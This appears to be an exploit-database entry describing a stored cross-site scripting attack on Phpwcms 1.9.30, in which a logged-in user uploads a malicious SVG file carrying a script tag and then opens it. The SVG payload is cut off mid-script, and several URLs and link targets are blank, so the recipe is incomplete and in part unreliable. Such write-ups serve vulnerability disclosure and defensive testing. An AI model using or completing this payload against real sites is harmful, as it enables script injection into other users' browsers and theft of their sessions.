# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus |
# Software Link:
# Version: 1.9.30
# Tested on: Ubuntu 16.04


1-) You need to login to the system.

2-) Creating payload with SVG extension: payload.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">

3-) Go to the following link and upload the payload:

From the menu:

file -> multiple file upload -> Select files or drop here

4-) After uploading payload, call it from the link below.